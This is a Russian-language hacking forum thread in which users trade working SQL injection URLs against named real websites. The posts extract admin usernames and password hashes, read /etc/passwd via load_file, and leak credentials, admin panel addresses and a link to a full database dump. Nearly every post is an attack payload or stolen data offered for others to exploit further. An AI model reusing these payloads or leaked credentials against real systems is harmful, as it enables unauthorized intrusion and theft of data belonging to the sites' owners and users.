http://www.jgkdo.org/hp/show_jg.php?id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,name,password),11,12+FROM+user+LIMIT+1,1/* Exozist:1688bc1a2663b585f4d0f7ba92f4ceb9: cracked by Ymrs: sb34ak20 adminka: jgkdo.org/hp/opz_login.htm Ну, товарищи....покажем немцам..
Колонки Code: http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x5553455253+limit+0,100/* Юзер/пасс Code: http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,concat(USERNAME,char(58),PASSWORD),5,6,7,8,9,10,11,12,13,14,15+from+users+limit+1,100/* Make fun! ______________ 159932, ты опоздал на 3 минуты))
root:6268a4a308ce2246:alex3.asc.edu:Monday1 test:2e8ff8cf35525756:nagios.asc.edu root:6268a4a308ce2246:%Monday1 test:2e8ff8cf35525756:intranet.asc.edu root:6268a4a308ce2246:129.66.12.21:Monday1 phpesp:6268a4a308ce2246:alex.asc.edu:Monday1 http://alex.state.al.us/admin/contextAdmin/contextAdmin.jsp?submit=Add+Context&addContextPath=&addContextDocBase=&removeContextName= 16к юзеров http://alex.state.al.us/phpinfo.php ================================================ http://www.onradio.gr/admin/index.php george:stelios есть cpanel - но не грузит (( https://onradio.gr:2083/ ================================================ vm_admin:686c821a80914aef822465b48019cd34:vm
Ляпис Трубецкой рулит)) http://www.lyapis.com/anons.php?id=-1+union+select+1,user,3,4,5/* Database Version: 4.1.22-standard Database name: lyapis_lyapis User name: lyapis_lyapis@localhost
Сегодня на нашем операционном столе сайт alfavideo.ru от группы компаний альфа арсенал, системы безопасности, аж самому смешно, хорошая у них безопасность)))). Приступим: Имена таблиц Колонки в таблице tbl_m_user Получаем всю инфу по админам Собстно логин и пасс 3х админчигов, которые были получены. И админка: http://www.alfavideo.ru/admin/ Make fun!
pr 3 5.0.32-Debian_7etch5-log::crimelab@localhost::crimelab Присутствует раскрытие путей: /home/aidoann/crimelab/welcome.html есть так же файл прив: Наслаждайтесь
Поддержим лоад_филе Code: http://www.747.ru/board/main/show/?id=-9999+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10/* Red_Red1 спс.
PR 7 PR 5 version():5.0.27-standard-log user():[email protected] database():expressionin Есть раскрытие путей: Code: /vservers/expressionin/htdocs/ Есть интересная табличка: PR 4 version():4.1.11-Debian_4sarge8-log user():mallen@localhost database():mallen PR 3 version():4.0.27-max-log user():[email protected] database():hornets247_v4_0 PR 3 version():4.1.22-log user():pmaste_blog@localhost database():pmaste_pmblog Есть раскрытие путей: PR 3 version():5.0.45-log user():myelgranpode@localhost database():wp3 PR 3 version():4.1.21-standard-log user():pro_rabot@localhost database():pro_r31rabota PR 1 version():5.0.24alyceu user():[email protected] database():leoq2_com_1 PR N/A PR N/A version():4.0.26 user():[email protected] database():ieeiuse_db
Бага Глянем имя БД Облом... а если так??? 4.1.11-Debian_4sarge8-log::newtid@localhost::newtid Бага 5.0.45-Debian_1ubuntu3.3-log::[email protected]::news_music Если чесно х3 откуда в линках пробелы побрались, их небыло!!!!! Поубирать не забудьте.
Лайт https://www.sclan.info/showthread.php?t=1295 ....Блин хацкер крутой, увидел статью и скуль выложил тут(небось чтоб репу подняли лол) З.Ы.Делаем выводы!Сорри пожалуйста за оффтоп!
Прости, но я там на зареген. Нашел скуль сам, если не веришь, почитай предыдущие мои посты по скулям, или ты думаешь что я настолько тупой и их тоже скопипастил? Этот сайт одна сплошная дырень, помимо моего шелла, там было еще 2, если быть точнее, то я раскрутил скуль 17/06/2008, а выложил только щас. Так что сам делай выводы. ЗЫ И уж кому, так точно не тебе меня учить, на себя лучше посмотри. ЗЗЫ Вот ты и спалился, я ждал когда ты появишся, тебе привет от 26, я думаю ты сразу поймешь о ком я, чето вы долго сайт свой поднимали... Если бы не 26 тогда тебе сказал про дыру, хер бы ты написал ту статью, я почему-то свой код запроса там узнаю. Я делал, отталкиваясь от этой статьи: https://forum.antichat.ru/thread43966.html, а вот тебе инфу слили... PS А вот и дамп ВСЕЙ базы, качайте на здоровье! http://ifolder.ru/7090064 Дату создания файла только гляньте... Ты не на того наехал олень.
http://easynotebook.890m.com/notelist.php?exid=2785J&n=15)%20UNION%20SELECT%201,database(),3,4,5,version(),7/* 4.1.22-standard (хотя ничего полезного там нету к сожалению) слепая: http://procreditbank.com.ua/?cat=130&num=220&news=3467%20AND%201=2 MYSQL 4.0.27-standard база mfb юзер [email protected]
понаходил скули... некоторые непохек..) разкручивайте кто может.. и сюда..) _____________________________________________ где же моя подпись?
Продолжим тему авиа**** и лоад_филе: Code: http://www.aviaport.ru/directory/publishers/?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,load_file(0x2f6574632f706173737764),27,28,29,30/* Версион, юзер, датабэйс через cast(version()/**/AS/**/binary)
http://www.rotawheels.com/news.php?id=-3+union+select+1,user(),version(),database(),5/* 4.1.20-log [email protected] 339068_rotanews http://www.phpbuddy.com/article.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6 4.1.21-standardhpbud22_phpbudd@localhosthpbud22_phpbuddy
